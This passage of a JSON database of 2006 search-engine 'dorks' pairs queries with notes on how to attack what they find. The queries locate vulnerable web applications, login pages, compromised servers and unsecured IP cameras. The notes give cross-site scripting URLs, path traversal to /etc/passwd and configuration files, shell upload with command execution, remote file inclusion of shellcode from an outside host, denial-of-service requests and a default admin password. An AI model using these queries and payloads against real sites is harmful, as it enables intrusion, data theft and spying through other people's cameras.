"submited": "2006-03-28", "request": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "id": 1314}, {"short description": "intext:\"powered by gcards\" -ihackstuff -exploit", "long description": "this is for gcards", "submited": "2006-03-28", "request": "intext:\"powered by gcards\" -ihackstuff -exploit", "id": 1315}, {"short description": "\"powered by php icalendar\" -ihackstuff -exploit", "long description": "this is for php iCalendar", "submited": "2006-03-28", "request": "\"powered by php icalendar\" -ihackstuff -exploit", "id": 1316}, {"short description": "\"powered by guestbook script\" -ihackstuff -exploit", "long description": "poc exploit & explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html", "submited": "2006-03-28", "request": "\"powered by guestbook script\" -ihackstuff -exploit", "id": 1317}, {"short description": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "long description": "tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... 
after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html", "submited": "2006-03-28", "request": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "id": 1318}, {"short description": "inurl:*.exe ext:exe inurl:/*cgi*/", "long description": "a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=\">[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=\">[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=\">[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=\">[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=\">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=\">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=\">[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=\">[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=\">[XSS HERE]&LIMIT=50&YEAR=\"> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=\">[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]", "submited": "2006-03-28", "request": "inurl:*.exe ext:exe inurl:/*cgi*/", "id": 1319}, {"short description": "\"powered by 
claroline\" -demo", "long description": "this is for Claroline e-learning platform", "submited": "2006-03-30", "request": "\"powered by claroline\" -demo", "id": 1320}, {"short description": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "long description": "this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html", "submited": "2006-03-30", "request": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "id": 1321}, {"short description": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "long description": "This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure.", "submited": "2006-04-06", "request": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "id": 1322}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "long description": "this is the dork for PHPMyChat", "submited": "2006-04-05", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 1323}, {"short description": "\"2004-2005 ReloadCMS Team.\"", "long description": "this is for ReloadCMS", "submited": "2006-04-05", "request": "\"2004-2005 ReloadCMS Team.\"", "id": 1324}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "long description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html", "submited": "2006-04-10", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 1325}, {"short 
description": "inurl:server.php ext:php intext:\"No SQL\" -Released", "long description": "vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html", "submited": "2006-04-10", "request": "inurl:server.php ext:php intext:\"No SQL\" -Released", "id": 1326}, {"short description": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "long description": "exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog", "submited": "2006-04-10", "request": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "id": 1327}, {"short description": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "long description": "this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html", "submited": "2006-04-10", "request": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "id": 1328}, {"short description": "inurl:\"extras/update.php\" intext:mysql.php -display", "long description": "this is an osCommerce dork:inurl:\"extras/update.php\" intext:mysql.php -display or more simply: inurl:\"extras/update.php\" -display (this display some more hosts where error_reporting=0) I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php 
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab also, if you succeed to view configure script with database details, you can connect to it trough some test scripts inside this folder...now I read this:http://www.securityfocus.com/bid/14294/infothis is actually unpatched/unresolved in 2.2 on Apr 2006", "submited": "2006-04-15", "request": "inurl:\"extras/update.php\" intext:mysql.php -display", "id": 1329}, {"short description": "inurl:sysinfo.cgi ext:cgi", "long description": "dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results", "submited": "2006-04-15", "request": "inurl:sysinfo.cgi ext:cgi", "id": 1330}, {"short description": "inurl:perldiver.cgi ext:cgi", "long description": "dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert(\"lol\")other reference:http://secunia.com/advisories/16888/", "submited": "2006-04-15", "request": "inurl:perldiver.cgi ext:cgi", "id": 1331}, {"short description": "inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk", "long description": "dork:inurl:tmssql.php ext:php mssql pear adodb -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651", "submited": "2006-04-15", "request": "inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk", "id": 1332}, {"short description": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" 
-demo2 -pitanje", "long description": "dork: \"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje poc: if register_globals = On & magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526", "submited": "2006-04-15", "request": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "id": 1333}, {"short description": "intitle:\"IVC Control Panel\"", "long description": "this searches for security cameras, vendor site:http://www.ivcco.com/", "submited": "2006-04-18", "request": "intitle:\"IVC Control Panel\"", "id": 1334}, {"short description": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "long description": "more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index", "submited": "2006-04-19", "request": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "id": 1335}, {"short description": "intitle:\"MvBlog powered\"", "long description": "MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. 
Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss", "submited": "2006-04-25", "request": "intitle:\"MvBlog powered\"", "id": 1336}, {"short description": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "long description": "Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps", "submited": "2006-04-25", "request": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "id": 1337}, {"short description": "Please enter a valid password! inurl:polladmin", "long description": "The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:\"Powered by PHP Poll Wizard\" | intitle:\"php poll wizard\"", "submited": "2006-04-25", "request": "Please enter a valid password! inurl:polladmin", "id": 1338}, {"short description": "\"Warning: Division by zero in\" \"on line\" -forum", "long description": "Just another error that reveals full paths.", "submited": "2006-04-25", "request": "\"Warning: Division by zero in\" \"on line\" -forum", "id": 1339}, {"short description": "inurl:resetcore.php ext:php", "long description": "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. 
It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html", "submited": "2006-04-25", "request": "inurl:resetcore.php ext:php", "id": 1340}, {"short description": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\" -help -forum", "long description": "This dork reveals logins to databases that were denied for some reason.", "submited": "2006-04-25", "request": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\" -help -forum", "id": 1341}, {"short description": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "long description": "Just another error message.", "submited": "2006-04-25", "request": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "id": 1342}, {"short description": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "long description": "and another error. open it from cache when not working.", "submited": "2006-04-25", "request": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "id": 1343}, {"short description": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "long description": "another error message", "submited": "2006-04-25", "request": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "id": 1344}, {"short description": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "long description": "Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps", "submited": "2006-04-25", "request": "\"This script was created by Php-ZeroNet\" \"Script . 
Php-ZeroNet\"", "id": 1345}, {"short description": "\"You have not provided a survey identification number\" ERROR -xoops.org \"please contact\"", "long description": "sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html", "submited": "2006-04-25", "request": "\"You have not provided a survey identification num", "id": 1346}, {"short description": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "long description": "it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps", "submited": "2006-04-25", "request": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "id": 1347}, {"short description": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "long description": "this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html", "submited": "2006-04-28", "request": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "id": 1348}, {"short description": "inurl:\"php121login.php\"", "long description": "\"PHP121 is a free web based instant messenger - written entirely in PHP. 
This means that it will work in any browser on any operating system including Windows and Linux, anywhere!\"", "submited": "2006-05-03", "request": "inurl:\"php121login.php\"", "id": 1349}, {"short description": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "long description": "Results include many varius Network activity logs", "submited": "2006-05-03", "request": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "id": 1350}, {"short description": "intitle:\"Employee Intranet Login\"", "long description": "Intranet login pages by decentrix.com", "submited": "2006-05-03", "request": "intitle:\"Employee Intranet Login\"", "id": 1351}, {"short description": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "long description": "File upload servers, dangerous if used in couple with mytrashmail.com", "submited": "2006-05-03", "request": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "id": 1352}, {"short description": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "long description": "Customer login pages\"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.\"", "submited": "2006-05-03", "request": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "id": 1353}, {"short description": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "long description": "\"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. 
WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.\"", "submited": "2006-05-03", "request": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "id": 1354}, {"short description": "intitle:\"Apache Status\" \"Apache Server Status for\"", "long description": "New Apache Server Status Dork", "submited": "2006-05-03", "request": "intitle:\"Apache Status\" \"Apache Server Status for\"", "id": 1355}, {"short description": "(intitle:\"rymo Login\")|(intext:\"Welcome to rymo\") -family", "long description": "\"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.\"", "submited": "2006-05-03", "request": "(intitle:\"rymo Login\")|(intext:\"Welcome to rymo\") -family", "id": 1356}, {"short description": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "long description": "\"TrackerCam is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.\"", "submited": "2006-05-03", "request": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "id": 1357}, {"short description": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "long description": "More SquirrelMail Logins", "submited": "2006-05-03", "request": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "id": 1358}, {"short description": "intitle:\"TWIG Login\"", "long description": "\"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. 
Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.\"", "submited": "2006-05-03", "request": "intitle:\"TWIG Login\"", "id": 1359}, {"short description": "intitle:IMP inurl:imp/index.php3", "long description": "Webmail Login pages for IMP\"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.\"", "submited": "2006-05-03", "request": "intitle:IMP inurl:imp/index.php3", "id": 1360}, {"short description": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "long description": "sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts.", "submited": "2006-05-03", "request": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "id": 1361}, {"short description": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "long description": "Login pages for SHOUTcast\"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. 
\"", "submited": "2006-05-03", "request": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "id": 1362}, {"short description": "intext:\"Target Multicast Group\" \"beacon\"", "long description": "\"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.\"see h**p://beacon.dast.nlanr.net", "submited": "2006-05-03", "request": "intext:\"Target Multicast Group\" \"beacon\"", "id": 1363}, {"short description": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "long description": "Logins for Forums powered by UBB.threads", "submited": "2006-05-03", "request": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "id": 1364}, {"short description": "intitle:\"Device Status Summary Page\" -demo", "long description": "hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... 
wooIncludes:Temperature (F)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:", "submited": "2006-05-03", "request": "intitle:\"Device Status Summary Page\" -demo", "id": 1365}, {"short description": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "long description": "Login Pages for WebMyStyle.\"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.\"", "submited": "2006-05-03", "request": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "id": 1366}, {"short description": "intitle:\"eXist Database Administration\" -demo", "long description": "Login Pages \"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.\"", "submited": "2006-05-03", "request": "intitle:\"eXist Database Administration\" -demo", "id": 1367}, {"short description": "intitle:\"Apache Tomcat\" \"Error Report\"", "long description": "Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error.", "submited": "2006-06-15", "request": "intitle:\"Apache Tomcat\" \"Error Report\"", "id": 1368}, {"short description": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "long description": "found this: a remote user can have access to some edit functionalities to \"modify\" html. 
Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705", "submited": "2006-05-04", "request": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "id": 1369}, {"short description": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "long description": "this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/", "submited": "2006-05-04", "request": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "id": 1370}, {"short description": "intitle:r57shell +uname -bbpress", "long description": "compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team", "submited": "2006-05-04", "request": "intitle:r57shell +uname -bbpress", "id": 1371}, {"short description": "intitle:\"iGuard Fingerprint Security System\"", "long description": "vendor:http://www.iguardus.com/dome information disclosure: employeers list & free camera access", "submited": "2006-05-04", "request": "intitle:\"iGuard Fingerprint Security System\"", "id": 1372}, {"short description": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "long description": "just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1348", "submited": "2006-05-04", "request": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "id": 1373}, {"short description": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "long description": "just more cameras vendor site: http://www.eyespyfx.com/", "submited": "2006-05-04", "request": "(intitle:(EyeSpyFX|OptiCamFX) \"go to 
camera\")|(inurl:servlet/DetectBrowser)", "id": 1374}, {"short description": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "long description": "this is for X7 Chat", "submited": "2006-05-04", "request": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "id": 1375}, {"short description": "inurl:cgi-bin/guestimage.html", "long description": "just more more MOBOTIX's", "submited": "2006-05-04", "request": "inurl:cgi-bin/guestimage.html", "id": 1376}, {"short description": "allinurl:tseekdir.cgi", "long description": "tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html", "submited": "2006-05-22", "request": "allinurl:tseekdir.cgi", "id": 1377}, {"short description": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "long description": "Badblue file sharing web server detection", "submited": "2006-05-23", "request": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "id": 1378}, {"short description": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "long description": "this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html", "submited": "2006-05-30", "request": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . 
Back to top -demo -\"deadly eyes\"", "id": 1379}, {"short description": "\"powered by pppblog v 0.3.(.)\"", "long description": "this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html", "submited": "2006-05-30", "request": "\"powered by pppblog v 0.3.(.)\"", "id": 1380}, {"short description": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "long description": "this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html", "submited": "2006-05-30", "request": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "id": 1381}, {"short description": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "long description": "this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory & poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html", "submited": "2006-05-30", "request": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "id": 1382}, {"short description": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "long description": "this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory & poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html", "submited": "2006-05-30", "request": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "id": 1383}, {"short description": "\"powered by ubbthreads\"", "long description": "forums 
powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded", "submited": "2006-06-02", "request": "\"powered by ubbthreads\"", "id": 1384}, {"short description": "intitle:\"SNC-RZ30 HOME\" -demo", "long description": "This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quite a few of these cameras have not been configured to deny you control. These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results. SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1 SNC-Z20", "submited": "2006-06-22", "request": "intitle:\"SNC-RZ30\" -demo", "id": 1385}, {"short description": "allintitle: EverFocus | EDSR | EDSR400 Applet", "long description": "Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query.", "submited": "2006-06-25", "request": "allintitle: EverFocus | EDSR | EDSR400 Applet", "id": 1386}, {"short description": "allintitle:Edr1680 remote viewer", "long description": "Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake.", "submited": "2006-06-25", "request": "allintitle:Edr1680 remote viewer", "id": 1387}, {"short description": "allintitle: EDR1600 login | Welcome", "long description": "Everfocus EDR1600", "submited": "2006-06-25", "request": "allintitle: EDR1600 login | Welcome", "id": 1388}, {"short description": "allintitle: EDR400 login | Welcome", "long description": "Everfocus EDR400", "submited": "2006-06-25", "request": "allintitle: EDR400 login | Welcome", "id": 1389}, {"short description": "FlashChat v4.5.7", "long description": "This simple search brings up lots of online Flash Chat clients. 
Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is \"adminpass\" (Without the speech marks).", "submited": "2006-07-29", "request": "FlashChat v4.5.7", "id": 1390}, {"short description": "intitle:\"Divar Web Client\"", "long description": "Boshe/Divar Net Cameras. Uses ActiveX - IE only.", "submited": "2006-06-25", "request": "intitle:\"Divar Web Client\"", "id": 1391}, {"short description": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" | \"intext:Select preset position\"", "long description": "No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows.", "submited": "2006-06-25", "request": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" | \"intext:Select preset position\"", "id": 1392}, {"short description": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "long description": "No one search will reveal all Axis cameras. This is a variant for the 2xxx series.", "submited": "2006-06-25", "request": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "id": 1393}, {"short description": "intitle:\"BlueNet Video Viewer\"", "long description": "Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. 
